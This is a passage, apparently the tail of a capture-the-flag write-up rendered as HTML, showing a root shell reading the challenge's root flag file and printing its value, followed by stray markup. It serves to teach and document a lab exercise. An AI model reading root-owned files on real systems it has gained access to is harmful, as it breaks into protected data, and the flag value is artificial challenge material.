root@98b9021fd1b8:/home/zeus/airgeddon# <span class="nb">cat</span> /mnt/root/root.txt
aba486990e2e849e25c23f6e41e5e303
</pre></td></tr></tbody></table></code></pre></div></div>
:ET